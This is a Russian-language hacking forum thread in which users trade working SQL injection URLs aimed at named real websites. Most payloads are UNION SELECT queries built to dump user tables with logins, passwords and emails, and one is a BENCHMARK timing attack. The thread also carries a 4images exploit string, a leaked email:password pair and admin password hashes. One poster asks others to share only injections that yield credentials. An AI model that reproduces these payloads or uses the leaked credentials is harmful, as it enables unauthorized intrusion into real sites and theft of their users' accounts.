SQL Инъекции

E-Disc.ru
больше 5к юзеров


http://e-disc.ru/details.php?Id=-1+union+select+1,2,3,lastname,5,pwd,7,8,9,10,11,12,13,14,country,16,17,18,city,20,21,22,23,24,25,26,email+from+users+limit+5000,5001/*

пароли к лич.каб на сайте не подходят, но у многих стоит у мыла тот же пароль. [email protected]:13011973 например...



2 терминал
http://mp3zzz.ru/alb/3-1 == http://mp3zzz.ru/alb/2
скуля вроде есть, но колонки подобрать не могу=\..

 

http://www.danpal.dk/index.php?doc=99999+union+select+1,2,3,4,5/*

 

_http://www.vanta.ru/script/catalog.php?cat=2+union+select+1,user(),3,database(),5,6,7,8,9,10/*&clas=2

 

http://www2.avis.it/usr_view.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/*

не могу подобрать

 

http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,3,4,5,6,7/*
\\\
http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),7,8,9,10,11,12,13/*
люди пишут сайты)))
одна из их "работ"
http://news.ivolga.ru/index.php?idnews=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/*&r=0&rn=0
интересно, что они курят...
http://www.sbbs.ru/news/index.php?id=999999999999+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/*

 

Code:

http://www.sport.com.ua/vote.phtml?id=-1+union+select+concat(username,char(58),password),2+from+users/*

maxim:91c0a0fbe2633617b9400c60ba9e0127

Code:

http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*

admin:de6d357c726f1d42c63b00ef18fc0d3f

Code:

http://www.untp.kiev.ua/index.php?id=-1+union+select+1,2,3,4,5,7/*

Code:

http://www.wrs.com.ua/?id=-1+union+select+1,2/*

 

http://www.onconference.ru/conferences/index.html?id=
http://www.promved.ru/articles/article.phtml?id=1005&nomer=9999+union+select+1,2,3,4/*
http://www.uprava.org/section.php?id=-99+union+select+1,2,3,4,6,7,8/*

 

_http://www.promdesign.com.ua/forum.html?level=3&pid='
_http://whoiswho.crimea.ua/result_s.php
_http://infoprom.com.ua/catalog.php?id=5'ion_id=&letter=&by=30&page=3
_http://www.boiko.com.ua/index.php?pname=childrens_home&p2=6'

 

http://forum.siemens-club.ru/viewboard.php?BoardID=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*

Подобрать не могу

 

SQL -ihj в 4 images
вот сплойт

Code:

<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
user_password%20from%204images_users%20where%20user_name=%2527ADMIN

вот сайт:http://www.sashapivovarova.com/galleryfans

подстовляю сплойт и ничего не происходит

 

что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул

Code:

http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*

http://digitalfx.ru/index.php?newsid=1146316404'

 

Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,user()/*

а http://www.e-financialconsulting.com 4ё-то у меня не грузится вообще =\

 

Чет немогу понять :/
http://www.nybmwcca.org/events.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
а вот это ваще хрень
http://www.nybmwcca.org/events.php?id=1+union+select+concat(user,char(58),password)+from%20+mysql.user/*

 

хм...я как-то так делал что оно мне говорило

Юзеру такому-то запрешен СЕЛЕКТ с базы.

http://www.synergisticresearch.com/

У тебя конструкция concat(user(),char(58),password()) прошла?

 

_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user(1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'

 

не выкладывай плиз инъекции где нельзя выводить полезную инфу (юзер,пасс), а то и так перебирать много

 

UPTIME.ru

UpTime.ru

8000 юзеров..

http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9,10,11,12+from+users+limit+8200,8201/*

 

Хостинг RussWeb.ru

http://www.russweb.ru/index.php?sn=rbc47&plan_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

 

=\

 

http://www.divo-ostrov.ru/rus/actions/fotoactions_index.php?id=BENCHMARK(1000000,MD5(NOW()))